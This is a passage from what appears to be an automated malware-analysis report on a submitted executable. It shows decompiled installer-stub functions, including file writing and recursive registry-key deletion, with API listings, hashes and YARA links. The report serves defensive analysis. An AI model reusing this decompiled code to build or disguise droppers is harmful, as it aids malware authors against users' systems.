                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$uvlcopdlxoed
                                                                                    • API String ID: 717251189-2520582795
                                                                                    • Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                                                    • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                                    • Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                                                    • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004063D2, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004063D2(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                    0x004063d4
                                                                                    0x004063dc
                                                                                    0x004063f0
                                                                                    0x004063f0
                                                                                    0x004063f6
                                                                                    0x00406403
                                                                                    0x00406403
                                                                                    0x00406404
                                                                                    0x00406406
                                                                                    0x0040640a
                                                                                    0x0040640c
                                                                                    0x00406415
                                                                                    0x00406417
                                                                                    0x00406431
                                                                                    0x00406439
                                                                                    0x00406439
                                                                                    0x0040643e
                                                                                    0x00406440
                                                                                    0x00406442
                                                                                    0x00406446
                                                                                    0x00406447
                                                                                    0x0040644a
                                                                                    0x00406452
                                                                                    0x00406454
                                                                                    0x00406458
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040645e
                                                                                    0x00406463
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406463
                                                                                    0x00406468

                                                                                    APIs
                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                                    • CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                                    Strings
                                                                                    • *?|<>/":, xrefs: 0040641A
                                                                                    • "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" , xrefs: 0040640E
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-2017582416
                                                                                    • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                    • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                                    • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                    • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004041E2, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                    0x004041f4
                                                                                    0x004042aa
                                                                                    0x00000000
                                                                                    0x004042aa
                                                                                    0x00404205
                                                                                    0x00404209
                                                                                    0x00000000
                                                                                    0x00404223
                                                                                    0x00404223
                                                                                    0x0040422c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040422e
                                                                                    0x0040423a
                                                                                    0x0040423d
                                                                                    0x0040423d
                                                                                    0x00404243
                                                                                    0x00404249
                                                                                    0x00404249
                                                                                    0x00404255
                                                                                    0x0040425b
                                                                                    0x00404262
                                                                                    0x00404265
                                                                                    0x00404268
                                                                                    0x0040426a
                                                                                    0x0040426a
                                                                                    0x00404272
                                                                                    0x00404278
                                                                                    0x00404278
                                                                                    0x00404282
                                                                                    0x00404287
                                                                                    0x0040428a
                                                                                    0x0040428f
                                                                                    0x00404292
                                                                                    0x00404292
                                                                                    0x004042a2
                                                                                    0x004042a2
                                                                                    0x00000000
                                                                                    0x004042a5

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                    • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                                                    • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                    • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040521E, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040521E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
					}
					_t26 = lstrlenA(0x42a070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                    0x00405224
                                                                                    0x00405230
                                                                                    0x00405233
                                                                                    0x00405239
                                                                                    0x00405245
                                                                                    0x00405248
                                                                                    0x0040524b
                                                                                    0x00405251
                                                                                    0x00405251
                                                                                    0x00405257
                                                                                    0x0040525f
                                                                                    0x00405262
                                                                                    0x0040527f
                                                                                    0x00405283
                                                                                    0x0040528c
                                                                                    0x0040528c
                                                                                    0x00405296
                                                                                    0x0040529f
                                                                                    0x004052ab
                                                                                    0x004052b2
                                                                                    0x004052b6
                                                                                    0x004052b9
                                                                                    0x004052cc
                                                                                    0x004052da
                                                                                    0x004052da
                                                                                    0x004052de
                                                                                    0x004052e0
                                                                                    0x004052e3
                                                                                    0x00000000
                                                                                    0x004052e3
                                                                                    0x00405264
                                                                                    0x0040526c
                                                                                    0x00405274
                                                                                    0x0040527a
                                                                                    0x00000000
                                                                                    0x0040527a
                                                                                    0x00405274
                                                                                    0x00405262
                                                                                    0x004052ed

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                    • lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                    • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,73BCEA30), ref: 0040527A
                                                                                    • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 2531174081-0
                                                                                    • Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                                                    • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                                                    • Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                                                    • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404ACE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                    0x00404adc
                                                                                    0x00404ae9
                                                                                    0x00404aef
                                                                                    0x00404b2d
                                                                                    0x00404b2d
                                                                                    0x00404b3c
                                                                                    0x00404b43
                                                                                    0x00000000
                                                                                    0x00404b45
                                                                                    0x00404af1
                                                                                    0x00404b00
                                                                                    0x00404b08
                                                                                    0x00404b0b
                                                                                    0x00404b1d
                                                                                    0x00404b23
                                                                                    0x00404b2a
                                                                                    0x00000000
                                                                                    0x00404b2a
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                                                    • GetMessagePos.USER32 ref: 00404AF1
                                                                                    • ScreenToClient.USER32 ref: 00404B0B
                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                    • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                                                    • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                    • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402DBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41d440; // 0x66495
					_t11 =  *0x42944c;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                    0x00402dc7
                                                                                    0x00402dd5
                                                                                    0x00402ddb
                                                                                    0x00402ddb
                                                                                    0x00402de9
                                                                                    0x00402deb
                                                                                    0x00402df1
                                                                                    0x00402df8
                                                                                    0x00402dfa
                                                                                    0x00402dfa
                                                                                    0x00402e10
                                                                                    0x00402e20
                                                                                    0x00402e32
                                                                                    0x00402e32
                                                                                    0x00402e3a

                                                                                    APIs
                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                    • MulDiv.KERNEL32(00066495,00000064,?), ref: 00402E00
                                                                                    • wsprintfA.USER32 ref: 00402E10
                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                                    • SetDlgItemTextA.USER32 ref: 00402E32
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 00402E0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                                    • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                                                    • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                                    • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 86%
                                                                                    			E004027DF(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405AFC(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405C6B(_t50);
				_t26 = E00405C90(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f438;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403300(_t45);
						E004032EA(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                                    0x004027df
                                                                                    0x004027e1
                                                                                    0x004027ed
                                                                                    0x004027f0
                                                                                    0x004027fa
                                                                                    0x004027fe
                                                                                    0x004027fe
                                                                                    0x00402804
                                                                                    0x00402811
                                                                                    0x00402819
                                                                                    0x0040281c
                                                                                    0x00402822
                                                                                    0x00402830
                                                                                    0x00402835
                                                                                    0x00402839
                                                                                    0x0040283c
                                                                                    0x00402845
                                                                                    0x00402851
                                                                                    0x00402855
                                                                                    0x00402858
                                                                                    0x00402862
                                                                                    0x00402887
                                                                                    0x00402869
                                                                                    0x0040286e
                                                                                    0x00402876
                                                                                    0x0040287c
                                                                                    0x00402881
                                                                                    0x00402881
                                                                                    0x0040288e
                                                                                    0x0040288e
                                                                                    0x0040289b
                                                                                    0x004028a1
                                                                                    0x004028b3
                                                                                    0x004028b3
                                                                                    0x004028b9
                                                                                    0x004028b9
                                                                                    0x004028c4
                                                                                    0x004028c5
                                                                                    0x004028c9
                                                                                    0x004028cd
                                                                                    0x004028d3
                                                                                    0x004028d3
                                                                                    0x004028da
                                                                                    0x004022dd
                                                                                    0x00402a5d
                                                                                    0x00402a69

                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                    • GlobalFree.KERNEL32 ref: 0040288E
                                                                                    • GlobalFree.KERNEL32 ref: 004028A1
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2667972263-0
                                                                                    • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                                    • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                                                    • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                                    • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 48%
                                                                                    			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406500(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                    0x00402cdb
                                                                                    0x00402ce4
                                                                                    0x00402ced
                                                                                    0x00402cf9
                                                                                    0x00402d02
                                                                                    0x00402d0c
                                                                                    0x00402d31
                                                                                    0x00402d37
                                                                                    0x00402d3c
                                                                                    0x00402d3d
                                                                                    0x00402d6d
                                                                                    0x00402d46
                                                                                    0x00402d48
                                                                                    0x00402d98
                                                                                    0x00402d9b
                                                                                    0x00000000
                                                                                    0x00402da1
                                                                                    0x00402d57
                                                                                    0x00402d5c
                                                                                    0x00402d5e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402d66
                                                                                    0x00402d6b
                                                                                    0x00402d6c
                                                                                    0x00402d6c
                                                                                    0x00402d79
                                                                                    0x00402d81
                                                                                    0x00402d88
                                                                                    0x00000000
                                                                                    0x00402db1
                                                                                    0x00000000
                                                                                    0x00402d90
                                                                                    0x00402d1c
                                                                                    0x00402d2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402d2f
                                                                                    0x00402db7

                                                                                    APIs
                                                                                    • RegEnumValueA.ADVAPI32 ref: 00402D24
                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
